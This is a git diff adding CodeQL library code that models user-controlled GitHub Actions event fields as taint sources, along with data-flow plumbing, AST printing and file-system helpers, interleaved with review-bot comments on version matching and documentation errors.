@@ -0,0 +1,137 @@ +import actions +import codeql.actions.DataFlow + +/** + * A data flow source. + */ +abstract class SourceNode extends DataFlow::Node { + /** + * Gets a string that represents the source kind with respect to threat modeling. + */ + abstract string getThreatModel(); +} + +/** A data flow source of remote user input. */ +abstract class RemoteFlowSource extends SourceNode { + /** Gets a string that describes the type of this remote flow source. */ + abstract string getSourceType(); + + override string getThreatModel() { result = "remote" } +} + +private class ChangedFilesSource extends RemoteFlowSource { + ChangedFilesSource() { + exists(UsesExpr uses | + uses.getTarget() = "tj-actions/changed-files" and + uses.getVersion() = ["v1", "v20", "v30", "v40"] and + uses = this.asExpr() + ) + } + + override string getSourceType() { result = "User-controlled list of changed files" } +} + +bindingset[context] +private predicate isExternalUserControlledIssue(string context) { + context.regexpMatch("\\bgithub\\s*\\.\\s*event\\s*\\.\\s*issue\\s*\\.\\s*title\\b") or + context.regexpMatch("\\bgithub\\s*\\.\\s*event\\s*\\.\\s*issue\\s*\\.\\s*body\\b") +} + +bindingset[context] +private predicate isExternalUserControlledPullRequest(string context) { + exists(string reg | + reg = + [ + "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*pull_request\\s*\\.\\s*title\\b", + "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*pull_request\\s*\\.\\s*body\\b", + "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*pull_request\\s*\\.\\s*head\\s*\\.\\s*label\\b", + "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*pull_request\\s*\\.\\s*head\\s*\\.\\s*repo\\s*\\.\\s*default_branch\\b", + "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*pull_request\\s*\\.\\s*head\\s*\\.\\s*repo\\s*\\.\\s*description\\b", + "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*pull_request\\s*\\.\\s*head\\s*\\.\\s*repo\\s*\\.\\s*homepage\\b", + "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*pull_request\\s*\\.\\s*head\\s*\\.\\s*ref\\b", + "\\bgithub\\s*\\.\\s*head_ref\\b" + ] + | + 
context.regexpMatch(reg) + ) +} + +bindingset[context] +private predicate isExternalUserControlledReview(string context) { + context.regexpMatch("\\bgithub\\s*\\.\\s*event\\s*\\.\\s*review\\s*\\.\\s*body\\b") +} + +bindingset[context] +private predicate isExternalUserControlledComment(string context) { + context.regexpMatch("\\bgithub\\s*\\.\\s*event\\s*\\.\\s*comment\\s*\\.\\s*body\\b") +} + +bindingset[context] +private predicate isExternalUserControlledGollum(string context) { + context + .regexpMatch("\\bgithub\\s*\\.\\s*event\\s*\\.\\s*pages\\[[0-9]+\\]\\s*\\.\\s*page_name\\b") or + context.regexpMatch("\\bgithub\\s*\\.\\s*event\\s*\\.\\s*pages\\[[0-9]+\\]\\s*\\.\\s*title\\b") +} + +bindingset[context] +private predicate isExternalUserControlledCommit(string context) { + exists(string reg | + reg = + [ + "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*commits\\[[0-9]+\\]\\s*\\.\\s*message\\b", + "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*head_commit\\s*\\.\\s*message\\b", + "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*head_commit\\s*\\.\\s*author\\s*\\.\\s*email\\b", + "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*head_commit\\s*\\.\\s*author\\s*\\.\\s*name\\b", + "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*head_commit\\s*\\.\\s*committer\\s*\\.\\s*email\\b", + "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*head_commit\\s*\\.\\s*committer\\s*\\.\\s*name\\b", + "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*commits\\[[0-9]+\\]\\s*\\.\\s*author\\s*\\.\\s*email\\b", + "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*commits\\[[0-9]+\\]\\s*\\.\\s*author\\s*\\.\\s*name\\b", + "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*commits\\[[0-9]+\\]\\s*\\.\\s*committer\\s*\\.\\s*email\\b", + "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*commits\\[[0-9]+\\]\\s*\\.\\s*committer\\s*\\.\\s*name\\b", + ] + | + context.regexpMatch(reg) + ) +} + +bindingset[context] +private predicate isExternalUserControlledDiscussion(string context) { + context.regexpMatch("\\bgithub\\s*\\.\\s*event\\s*\\.\\s*discussion\\s*\\.\\s*title\\b") or + 
context.regexpMatch("\\bgithub\\s*\\.\\s*event\\s*\\.\\s*discussion\\s*\\.\\s*body\\b") +} + +bindingset[context] +private predicate isExternalUserControlledWorkflowRun(string context) { + exists(string reg | + reg = + [ + "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*workflow_run\\s*\\.\\s*head_branch\\b", + "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*workflow_run\\s*\\.\\s*display_title\\b", + "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*workflow_run\\s*\\.\\s*head_repository\\b\\s*\\.\\s*description\\b", + "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*workflow_run\\s*\\.\\s*head_commit\\b\\s*\\.\\s*message\\b", + "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*workflow_run\\s*\\.\\s*head_commit\\b\\s*\\.\\s*author\\b\\s*\\.\\s*email\\b", + "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*workflow_run\\s*\\.\\s*head_commit\\b\\s*\\.\\s*author\\b\\s*\\.\\s*name\\b", + "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*workflow_run\\s*\\.\\s*head_commit\\b\\s*\\.\\s*committer\\b\\s*\\.\\s*email\\b", + "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*workflow_run\\s*\\.\\s*head_commit\\b\\s*\\.\\s*committer\\b\\s*\\.\\s*name\\b", + ] + | + context.regexpMatch(reg) + ) +} + +private class EventSource extends RemoteFlowSource { + EventSource() { + exists(ExprAccessExpr e, string context | this.asExpr() = e and context = e.getExpression() | + isExternalUserControlledIssue(context) or + isExternalUserControlledPullRequest(context) or + isExternalUserControlledReview(context) or + isExternalUserControlledComment(context) or + isExternalUserControlledGollum(context) or + isExternalUserControlledCommit(context) or + isExternalUserControlledDiscussion(context) or + isExternalUserControlledWorkflowRun(context) + ) + } + + override string getSourceType() { result = "User-controlled events" } +} diff --git a/ql/lib/codeql/actions/dataflow/FlowSteps.qll b/ql/lib/codeql/actions/dataflow/FlowSteps.qll new file mode 100644 index 00000000000..528f9e54832 --- /dev/null +++ b/ql/lib/codeql/actions/dataflow/FlowSteps.qll 
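Review bot: `ChangedFilesSource` compares `uses.getVersion()` for equality with only `"v1"`, `"v20"`, `"v30"` and `"v40"`, so a workflow that pins `tj-actions/changed-files` to any other tag in that range is not modelled as a source. Assuming `getVersion()` returns the ref after `@` (its definition is outside this hunk), tags such as `v35` or `v40.1.0` and commit-SHA pins are all missed, which gives false negatives for the query built on this source. If the intent is every release up to v40, a range match such as `uses.getVersion().regexpMatch("v([1-9]|[1-3][0-9]|40)(\\..*)?")` expresses it. SHA pins need separate handling, and a comment stating which versions are considered affected would make the list auditable.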
@@ -0,0 +1,31 @@
+/**
+ * Provides classes representing various flow steps for taint tracking.
+ */
+
+import actions
+private import codeql.util.Unit
+private import codeql.actions.DataFlow
+
+/**
+ * A unit class for adding additional taint steps.
+ *
+ * Extend this class to add additional taint steps that should apply to all
+ * taint configurations.
+ */
+class AdditionalTaintStep extends Unit {
+ /**
+ * Holds if the step from `node1` to `node2` should be considered a taint
+ * step for all configurations.
+ */
+ abstract predicate step(DataFlow::Node node1, DataFlow::Node node2);
+}
+
+private class ActionsFindAndReplaceStringStep extends AdditionalTaintStep {
+ override predicate step(DataFlow::Node pred, DataFlow::Node succ) {
+ exists(UsesExpr u |
+ u.getTarget() = "mad9000/actions-find-and-replace-string" and
+ pred.asExpr() = u.getArgument(["source", "replace"]) and
+ succ.asExpr() = u
+ )
+ }
+}
diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowImplSpecific.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowImplSpecific.qll
new file mode 100644
index 00000000000..4abb455b0dd
--- /dev/null
+++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowImplSpecific.qll
@@ -0,0 +1,11 @@
+/**
+ * Provides Actions-specific definitions for use in the data flow library.
+ * Implementation of https://github.com/github/codeql/blob/main/shared/dataflow/codeql/dataflow/DataFlow.qll
+ */
+
+private import codeql.dataflow.DataFlow
+
+module ActionsDataFlow implements InputSig {
+ import DataFlowPrivate
+ import DataFlowPublic
+}
diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll
new file mode 100644
index 00000000000..b4abb3e8aa5
--- /dev/null
+++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll
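Review bot: `ActionsFindAndReplaceStringStep` in FlowSteps.qll has no QLDoc, so the reader cannot tell why `source` and `replace` carry taint while the action's other inputs do not. A short QLDoc on the class should say that these two inputs are modelled as flowing to the `uses` step itself. Since `stepOutputDefToUse` in DataFlowPrivate.qll links a `UsesExpr` to every `StepOutputAccessExpr` with the same step id, the comment should also note that taint then reaches any output read from that step, not one named output.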
@@ -0,0 +1,312 @@ +private import codeql.dataflow.DataFlow +private import codeql.actions.Ast +private import codeql.actions.Cfg as Cfg +private import codeql.Locations +private import codeql.actions.controlflow.BasicBlocks +private import DataFlowPublic + +cached +newtype TNode = TExprNode(DataFlowExpr e) + +/** + * Not used + */ +class ParameterNode extends Node { + ParameterNode() { none() } +} + +/** + * Not used + */ +class ReturnNode extends Node { + ReturnNode() { none() } + + ReturnKind getKind() { none() } +} + +class OutNode extends ExprNode { + private DataFlowCall call; + + OutNode() { call = this.getCfgNode() } + + DataFlowCall getCall(ReturnKind kind) { + result = call and + kind instanceof NormalReturn + } +} + +class CastNode extends Node { + CastNode() { none() } +} + +class PostUpdateNode extends Node { + PostUpdateNode() { none() } + + Node getPreUpdateNode() { none() } +} + +predicate isParameterNode(ParameterNode p, DataFlowCallable c, ParameterPosition pos) { none() } + +predicate isArgumentNode(ArgumentNode arg, DataFlowCall call, ArgumentPosition pos) { + arg.argumentOf(call, pos) +} + +DataFlowCallable nodeGetEnclosingCallable(Node node) { + node = TExprNode(any(DataFlowExpr e | result = e.getScope())) +} + +DataFlowType getNodeType(Node node) { any() } + +predicate nodeIsHidden(Node node) { none() } + +class DataFlowExpr extends Cfg::Node { + DataFlowExpr() { this.getAstNode() instanceof Expression } +} + +/** + * A call corresponds to a Uses steps where a 3rd party action gets called + */ +class DataFlowCall instanceof Cfg::Node { + DataFlowCall() { super.getAstNode() instanceof UsesExpr } + + /** Gets a textual representation of this element. 
*/ + string toString() { result = super.toString() } + + Location getLocation() { result = super.getLocation() } + + string getName() { result = super.getAstNode().(UsesExpr).getTarget() } + + DataFlowCallable getEnclosingCallable() { result = super.getScope() } +} + +// class DataFlowCallable instanceof Cfg::CfgScope { +// DataFlowCallable() { none() } +// +// string toString() { result = super.toString() } +// +// string getName() { result = "none" } +// } +/** + * A Cfg scope that can be called + * There are no callables in Actions, at least not in the AST + */ +class DataFlowCallable instanceof Cfg::CfgScope { + string toString() { result = super.toString() } + + Location getLocation() { result = super.getLocation() } + + string getName() { + if this instanceof StepStmt + then result = this.(StepStmt).getName() + else result = this.(JobStmt).getName() + } +} + +newtype TReturnKind = TNormalReturn() + +abstract class ReturnKind extends TReturnKind { + /** Gets a textual representation of this element. */ + abstract string toString(); +} + +class NormalReturn extends ReturnKind, TNormalReturn { + override string toString() { result = "return" } +} + +/** Gets a viable implementation of the target of the given `Call`. */ +DataFlowCallable viableCallable(DataFlowCall c) { none() } + +// /** +// * Holds if the set of viable implementations that can be called by `call` +// * might be improved by knowing the call context. +// */ +// predicate mayBenefitFromCallContext(DataFlowCall call, DataFlowCallable c) { none() } +// /** +// * Gets a viable dispatch target of `call` in the context `ctx`. This is +// * restricted to those `call`s for which a context might make a difference. +// */ +// DataFlowCallable viableImplInCallContext(DataFlowCall call, DataFlowCall ctx) { none() } +/** + * Gets a node that can read the value returned from `call` with return kind + * `kind`. 
+ */ +OutNode getAnOutNode(DataFlowCall call, ReturnKind kind) { call = result.getCall(kind) } + +private newtype TDataFlowType = TUnknownDataFlowType() + +/** + * A type for a data flow node. + * + * This may or may not coincide with any type system existing for the source + * language, but should minimally include unique types for individual closure + * expressions (typically lambdas). + */ +class DataFlowType extends TDataFlowType { + string toString() { result = "" } +} + +string ppReprType(DataFlowType t) { none() } + +bindingset[t1, t2] +predicate compatibleTypes(DataFlowType t1, DataFlowType t2) { t1 = t2 } + +predicate typeStrongerThan(DataFlowType t1, DataFlowType t2) { none() } + +private newtype TContent = TNoContent() { none() } + +class Content extends TContent { + /** Gets a textual representation of this element. */ + string toString() { none() } +} + +predicate forceHighPrecision(Content c) { none() } + +newtype TContentSet = TNoContentSet() { none() } + +private newtype TContentApprox = TNoContentApprox() { none() } + +class ContentApprox extends TContentApprox { + /** Gets a textual representation of this element. 
*/ + string toString() { none() } +} + +ContentApprox getContentApprox(Content c) { none() } + +/** + * Not used since we dont have Callables in the AST + * Made a string to match the ArgumentPosition type + */ +class ParameterPosition extends string { + ParameterPosition() { none() } +} + +/** + * Made a string to match `With:` keys in the AST + */ +class ArgumentPosition extends string { + ArgumentPosition() { exists(any(UsesExpr e).getArgument(this)) } +} + +/** + * Not really used since we dont have Callables in the AST but needed for the InputSig signature + */ +predicate parameterMatch(ParameterPosition ppos, ArgumentPosition apos) { ppos = apos } + +/** + * a simple local flow step + */ +predicate simpleLocalFlowStep(Node nodeFrom, Node nodeTo) { localFlowStep(nodeFrom, nodeTo) } + +predicate stepOutputDefToUse(Node nodeFrom, Node nodeTo) { + // nodeTo is an OutputVarAccessExpr scoped with the namespace of the nodeFrom Step output + exists(UsesExpr uses, StepOutputAccessExpr outputRead | + uses = nodeFrom.asExpr() and + outputRead = nodeTo.asExpr() and + outputRead.getStepId() = uses.getId() and + uses.getJob() = outputRead.getJob() + ) +} + +predicate test1(UsesExpr u, string f, JobStmt j) { + u.getLocation().getFile().getBaseName() = "inter1.yml" and + f = u.getId() and + j = u.getJob() +} + +predicate test2(StepOutputAccessExpr r, string f, JobStmt j) { + r.getLocation().getFile().getBaseName() = "inter1.yml" and + f = r.getStepId() and + j = r.getJob() +} + +predicate test3(UsesExpr u, StepOutputAccessExpr r, Node n) { + r.getLocation().getFile().getBaseName() = "inter1.yml" and + u.getLocation().getFile().getBaseName() = "inter1.yml" and + u.getId() = r.getStepId() and + u.getJob() = r.getJob() and + // el SOAE has no mapping DF NODE + n.asExpr() = r +} + +predicate jobOutputDefToUse(Node nodeFrom, Node nodeTo) { + // nodeTo is a JobOutputAccessExpr and nodeFrom is the Job output expression + exists(Expression astFrom, JobOutputAccessExpr astTo | + 
astFrom = nodeFrom.asExpr() and + astTo = nodeTo.asExpr() and + astTo.getOutputExpr() = astFrom + ) +} + +/** + * Holds if there is a local flow step from `nodeFrom` to `nodeTo`. + * For Actions, we dont need SSA nodes since it should be already in SSA form + * Local flow steps are always between two nodes in the same Cfg scope (job definition). + */ +pragma[nomagic] +predicate localFlowStep(Node nodeFrom, Node nodeTo) { + stepOutputDefToUse(nodeFrom, nodeTo) or + jobOutputDefToUse(nodeFrom, nodeTo) +} + +/** + * Holds if data can flow from `node1` to `node2` through a non-local step + * that does not follow a call edge. For example, a step through a global + * variable. + */ +predicate jumpStep(Node node1, Node node2) { none() } + +/** + * Holds if data can flow from `node1` to `node2` via a read of `c`. Thus, + * `node1` references an object with a content `c.getAReadContent()` whose + * value ends up in `node2`. + */ +predicate readStep(Node node1, ContentSet c, Node node2) { none() } + +/** + * Holds if data can flow from `node1` to `node2` via a store into `c`. Thus, + * `node2` references an object with a content `c.getAStoreContent()` that + * contains the value of `node1`. + */ +predicate storeStep(Node node1, ContentSet c, Node node2) { none() } + +/** + * Holds if values stored inside content `c` are cleared at node `n`. For example, + * any value stored inside `f` is cleared at the pre-update node associated with `x` + * in `x.f = newValue`. + */ +predicate clearsContent(Node n, ContentSet c) { none() } + +/** + * Holds if the value that is being tracked is expected to be stored inside content `c` + * at node `n`. + */ +predicate expectsContent(Node n, ContentSet c) { none() } + +/** + * Holds if the node `n` is unreachable when the call context is `call`. 
+ */ +predicate isUnreachableInCall(Node n, DataFlowCall call) { none() } + +/** + * Holds if flow is allowed to pass from parameter `p` and back to itself as a + * side-effect, resulting in a summary from `p` to itself. + * + * One example would be to allow flow like `p.foo = p.bar;`, which is disallowed + * by default as a heuristic. + */ +predicate allowParameterReturnInSelf(ParameterNode p) { none() } + +predicate localMustFlowStep(Node nodeFrom, Node nodeTo) { localFlowStep(nodeFrom, nodeTo) } + +private newtype TLambdaCallKind = TNone() + +class LambdaCallKind = TLambdaCallKind; + +/** Holds if `creation` is an expression that creates a lambda of kind `kind` for `c`. */ +predicate lambdaCreation(Node creation, LambdaCallKind kind, DataFlowCallable c) { none() } + +/** Holds if `call` is a lambda call of kind `kind` where `receiver` is the lambda expression. */ +predicate lambdaCall(DataFlowCall call, LambdaCallKind kind, Node receiver) { none() } + +/** Extra data-flow steps needed for lambda flow analysis. */ +predicate additionalLambdaFlowStep(Node nodeFrom, Node nodeTo, boolean preservesValue) { none() } diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll new file mode 100644 index 00000000000..41be90718d8 --- /dev/null +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll 
@@ -0,0 +1,78 @@ +private import codeql.dataflow.DataFlow +private import codeql.actions.Ast +private import codeql.actions.Cfg as Cfg +private import codeql.Locations +private import DataFlowPrivate + +class Node extends TNode { + /** Gets a textual representation of this element. */ + string toString() { none() } + + Location getLocation() { none() } + + /** + * Holds if this element is at the specified location. + * The location spans column `startcolumn` of line `startline` to + * column `endcolumn` of line `endline` in file `filepath`. + * For more information, see + * [Locations](https://codeql.github.com/docs/writing-codeql-queries/providing-locations-in-codeql-queries/). + */ + predicate hasLocationInfo( + string filepath, int startline, int startcolumn, int endline, int endcolumn + ) { + this.getLocation().hasLocationInfo(filepath, startline, startcolumn, endline, endcolumn) + } + + AstNode asExpr() { none() } +} + +/** + * Any Ast Expression + * UsesExpr, RunExpr, ArgumentExpr, VarAccessExpr, ... + */ +class ExprNode extends Node, TExprNode { + private DataFlowExpr expr; + + ExprNode() { this = TExprNode(expr) } + + Cfg::Node getCfgNode() { result = expr } + + override string toString() { result = expr.toString() } + + override Location getLocation() { result = expr.getLocation() } + + override AstNode asExpr() { result = expr.getAstNode() } +} + +/** + * An argument to a Uses step (call) + */ +class ArgumentNode extends ExprNode { + ArgumentNode() { this.getCfgNode().getAstNode() = any(UsesExpr e).getArgument(_) } + + predicate argumentOf(DataFlowCall call, ArgumentPosition pos) { + this.getCfgNode() = call.(Cfg::Node).getAPredecessor+() and + call.(Cfg::Node).getAstNode() = + any(UsesExpr e | e.getArgument(pos) = this.getCfgNode().getAstNode()) + } +} + +/** Gets the node corresponding to `e`. */ +Node exprNode(DataFlowExpr e) { result = TExprNode(e) } + +/** + * An entity that represents a set of `Content`s. 
+ * + * The set may be interpreted differently depending on whether it is + * stored into (`getAStoreContent`) or read from (`getAReadContent`). + */ +class ContentSet extends TContentSet { + /** Gets a textual representation of this element. */ + string toString() { none() } + + /** Gets a content that may be stored into when storing into this set. */ + Content getAStoreContent() { none() } + + /** Gets a content that may be read from when reading from this set. */ + Content getAReadContent() { none() } +} diff --git a/ql/lib/codeql/actions/dataflow/internal/TaintTrackingImplSpecific.qll b/ql/lib/codeql/actions/dataflow/internal/TaintTrackingImplSpecific.qll new file mode 100644 index 00000000000..c2d51748f20 --- /dev/null +++ b/ql/lib/codeql/actions/dataflow/internal/TaintTrackingImplSpecific.qll @@ -0,0 +1,11 @@ +/** + * Provides Actions-specific definitions for use in the taint tracking library. + * Implementation of https://github.com/github/codeql/blob/main/shared/dataflow/codeql/dataflow/TaintTracking.qll + */ + +private import codeql.dataflow.TaintTracking +private import DataFlowImplSpecific + +module ActionsTaintTracking implements InputSig { + import TaintTrackingPrivate +} diff --git a/ql/lib/codeql/actions/dataflow/internal/TaintTrackingPrivate.qll b/ql/lib/codeql/actions/dataflow/internal/TaintTrackingPrivate.qll new file mode 100644 index 00000000000..a7e0d23df2b --- /dev/null +++ b/ql/lib/codeql/actions/dataflow/internal/TaintTrackingPrivate.qll 
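Review bot: In `ArgumentNode.argumentOf` the first conjunct, `this.getCfgNode() = call.(Cfg::Node).getAPredecessor+()`, requires the argument to be a transitive CFG predecessor of the call, on top of the AST condition that already ties it to the `UsesExpr` at `pos`. The CFG is defined outside this hunk, so I cannot confirm that every `with:` value is ordered before its step. If one is not, the argument stops binding and flow into the action is lost, which a security query would show as a missed result rather than an error. Either drop the conjunct or keep it with a comment stating the invariant, for example `// with: values are visited by the CFG before the step that consumes them`.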
@@ -0,0 +1,30 @@
+/**
+ * Provides modules for performing local (intra-procedural) and
+ * global (inter-procedural) taint-tracking analyses.
+ */
+
+private import DataFlowPrivate
+private import codeql.actions.DataFlow
+private import codeql.actions.dataflow.FlowSteps
+private import codeql.actions.Ast
+
+/**
+ * Holds if `node` should be a sanitizer in all global taint flow configurations
+ * but not in local taint.
+ */
+predicate defaultTaintSanitizer(DataFlow::Node node) { none() }
+
+/**
+ * Holds if the additional step from `nodeFrom` to `nodeTo` should be included
+ * in all global taint flow configurations.
+ */
+predicate defaultAdditionalTaintStep(DataFlow::Node nodeFrom, DataFlow::Node nodeTo) {
+ any(AdditionalTaintStep s).step(nodeFrom, nodeTo)
+}
+
+/**
+ * Holds if taint flow configurations should allow implicit reads of `c` at sinks
+ * and inputs to additional taint steps.
+ */
+bindingset[node]
+predicate defaultImplicitTaintRead(DataFlow::Node node, DataFlow::ContentSet c) { none() }
diff --git a/ql/lib/codeql/actions/ideContextual/IDEContextual.qll b/ql/lib/codeql/actions/ideContextual/IDEContextual.qll
new file mode 100644
index 00000000000..90ce11764b5
--- /dev/null
+++ b/ql/lib/codeql/actions/ideContextual/IDEContextual.qll
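Review bot: The file-level QLDoc of TaintTrackingPrivate.qll says it "Provides modules for performing local (intra-procedural) and global (inter-procedural) taint-tracking analyses", but the file defines no modules, only the three default predicates. I would replace the header text with `Provides the Actions-specific default sanitizers, additional taint steps and implicit reads used by the taint-tracking library.` Because `defaultTaintSanitizer` is `none()`, it is also worth one sentence in its QLDoc saying that no barrier applies by default and each query must declare its own.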
@@ -0,0 +1,19 @@
+private import codeql.files.FileSystem
+
+/**
+ * Returns an appropriately encoded version of a filename `name`
+ * passed by the VS Code extension in order to coincide with the
+ * output of `.getFile()` on locatable entities.
+ */
+cached
+File getFileBySourceArchiveName(string name) {
+ // The name provided for a file in the source archive by the VS Code extension
+ // has some differences from the absolute path in the database:
+ // 1. colons are replaced by underscores
+ // 2. there's a leading slash, even for Windows paths: "C:/foo/bar" ->
+ // "/C_/foo/bar"
+ // 3. double slashes in UNC prefixes are replaced with a single slash
+ // We can handle 2 and 3 together by unconditionally adding a leading slash
+ // before replacing double slashes.
+ name = ("/" + result.getAbsolutePath().replaceAll(":", "_")).replaceAll("//", "/")
+}
\ No newline at end of file
diff --git a/ql/lib/codeql/actions/ideContextual/printAst.qll b/ql/lib/codeql/actions/ideContextual/printAst.qll
new file mode 100644
index 00000000000..f8a7c16f071
--- /dev/null
+++ b/ql/lib/codeql/actions/ideContextual/printAst.qll
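Review bot: The QLDoc on `getFileBySourceArchiveName` describes the mapping backwards: it says the predicate returns an encoded version of `name`, while the body returns the `File` whose encoded absolute path equals `name`. I would reword it to `Gets the file whose absolute path, encoded the way the VS Code extension encodes source-archive names, is \`name\`.` That wording also follows the "Gets" convention used by the other QLDoc comments in this commit. The file also ends without a trailing newline.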
@@ -0,0 +1,137 @@ +/** + * Provides queries to pretty-print an Kaleidoscope abstract syntax tree as a graph. + * + * By default, this will print the AST for all nodes in the database. To change + * this behavior, extend `PrintASTConfiguration` and override `shouldPrintNode` + * to hold for only the AST nodes you wish to view. + */ + +private import codeql.actions.Ast +private import codeql.Locations + +/** + * The query can extend this class to control which nodes are printed. + */ +class PrintAstConfiguration extends string { + PrintAstConfiguration() { this = "PrintAstConfiguration" } + + /** + * Holds if the given node should be printed. + */ + predicate shouldPrintNode(PrintAstNode n) { any() } +} + +newtype TPrintNode = TPrintRegularAstNode(AstNode n) { any() } + +private predicate shouldPrintNode(PrintAstNode n) { + any(PrintAstConfiguration config).shouldPrintNode(n) +} + +/** + * A node in the output tree. + */ +class PrintAstNode extends TPrintNode { + /** Gets a textual representation of this node in the PrintAst output tree. */ + string toString() { none() } + + /** + * Gets the child node with name `edgeName`. Typically this is the name of the + * predicate used to access the child. + */ + PrintAstNode getChild(string edgeName) { none() } + + /** Get the Location of this AST node */ + Location getLocation() { none() } + + /** Gets a child of this node. */ + final PrintAstNode getAChild() { result = this.getChild(_) } + + /** Gets the parent of this node, if any. */ + final PrintAstNode getParent() { result.getAChild() = this } + + /** Gets a value used to order this node amongst its siblings. 
*/ + int getOrder() { + this = + rank[result](PrintRegularAstNode p, Location l, File f | + l = p.getLocation() and + f = l.getFile() + | + p + order by + f.getBaseName(), f.getAbsolutePath(), l.getStartLine(), l.getStartColumn(), + l.getEndLine(), l.getEndColumn() + ) + } + + /** + * Gets the value of the property of this node, where the name of the property + * is `key`. + */ + final string getProperty(string key) { + key = "semmle.label" and + result = this.toString() + or + key = "semmle.order" and result = this.getOrder().toString() + } +} + +/** An `AstNode` in the output tree. */ +class PrintRegularAstNode extends PrintAstNode, TPrintRegularAstNode { + AstNode astNode; + + PrintRegularAstNode() { this = TPrintRegularAstNode(astNode) } + + override string toString() { + result = "[" + concat(astNode.getAPrimaryQlClass(), ", ") + "] " + astNode.toString() + } + + override Location getLocation() { result = astNode.getLocation() } + + override PrintAstNode getChild(string name) { + exists(int i | + name = i.toString() and + result = + TPrintRegularAstNode(rank[i](AstNode child, Location l | + child.getParentNode() = astNode and + child.getLocation() = l + | + child + order by + l.getStartLine(), l.getStartColumn(), l.getEndColumn(), l.getEndLine(), + child.toString() + )) + ) + } +} + +/** + * Holds if `node` belongs to the output tree, and its property `key` has the + * given `value`. + */ +query predicate nodes(PrintAstNode node, string key, string value) { + value = node.getProperty(key) and shouldPrintNode(node) +} + +/** + * Holds if `target` is a child of `source` in the AST, and property `key` of + * the edge has the given `value`. 
+ */ +query predicate edges(PrintAstNode source, PrintAstNode target, string key, string value) { + shouldPrintNode(source) and + shouldPrintNode(target) and + target = source.getChild(_) and + ( + key = "semmle.label" and + value = strictconcat(string name | source.getChild(name) = target | name, "/") + or + key = "semmle.order" and + value = target.getProperty("semmle.order") + ) +} + +/** + * Holds if property `key` of the graph has the given `value`. + */ +query predicate graphProperties(string key, string value) { + key = "semmle.graphKind" and value = "tree" +} diff --git a/ql/lib/codeql/files/FileSystem.qll b/ql/lib/codeql/files/FileSystem.qll new file mode 100644 index 00000000000..552b85a4673 --- /dev/null +++ b/ql/lib/codeql/files/FileSystem.qll 
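Review bot: The header comment of printAst.qll still describes another language and a class that does not exist here. It says "pretty-print an Kaleidoscope abstract syntax tree" and tells the reader to extend `PrintASTConfiguration`, while the class declared below is `PrintAstConfiguration`. I would change the first line to `Provides queries to pretty-print a GitHub Actions workflow abstract syntax tree as a graph.` and correct the class name in the second paragraph so the instructions can be followed as written.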
@@ -0,0 +1,177 @@ +/** Provides classes for working with files and folders. */ + +private import codeql.Locations + +/** A file or folder. */ +abstract class Container extends @container { + /** Gets a file or sub-folder in this container. */ + Container getAChildContainer() { this = result.getParentContainer() } + + /** Gets a file in this container. */ + File getAFile() { result = this.getAChildContainer() } + + /** Gets a sub-folder in this container. */ + Folder getAFolder() { result = this.getAChildContainer() } + + /** + * Gets the absolute, canonical path of this container, using forward slashes + * as path separator. + * + * The path starts with a _root prefix_ followed by zero or more _path + * segments_ separated by forward slashes. + * + * The root prefix is of one of the following forms: + * + * 1. A single forward slash `/` (Unix-style) + * 2. An upper-case drive letter followed by a colon and a forward slash, + * such as `C:/` (Windows-style) + * 3. Two forward slashes, a computer name, and then another forward slash, + * such as `//FileServer/` (UNC-style) + * + * Path segments are never empty (that is, absolute paths never contain two + * contiguous slashes, except as part of a UNC-style root prefix). Also, path + * segments never contain forward slashes, and no path segment is of the + * form `.` (one dot) or `..` (two dots). + * + * Note that an absolute path never ends with a forward slash, except if it is + * a bare root prefix, that is, the path has no path segments. A container + * whose absolute path has no segments is always a `Folder`, not a `File`. + */ + abstract string getAbsolutePath(); + + /** + * Gets the base name of this container including extension, that is, the last + * segment of its absolute path, or the empty string if it has no segments. + * + * Here are some examples of absolute paths and the corresponding base names + * (surrounded with quotes to avoid ambiguity): + * + * + * + * + * + * + * + * + * + *
Absolute pathBase name
"/tmp/tst.go""tst.go"
"C:/Program Files (x86)""Program Files (x86)"
"/"""
"C:/"""
"D:/"""
"//FileServer/"""
+ */ + string getBaseName() { + result = this.getAbsolutePath().regexpCapture(".*/(([^/]*?)(?:\\.([^.]*))?)", 1) + } + + /** + * Gets the extension of this container, that is, the suffix of its base name + * after the last dot character, if any. + * + * In particular, + * + * - if the name does not include a dot, there is no extension, so this + * predicate has no result; + * - if the name ends in a dot, the extension is the empty string; + * - if the name contains multiple dots, the extension follows the last dot. + * + * Here are some examples of absolute paths and the corresponding extensions + * (surrounded with quotes to avoid ambiguity): + * + * + * + * + * + * + * + * + *
Absolute pathExtension
"/tmp/tst.go""go"
"/tmp/.classpath""classpath"
"/bin/bash"not defined
"/tmp/tst2."""
"/tmp/x.tar.gz""gz"
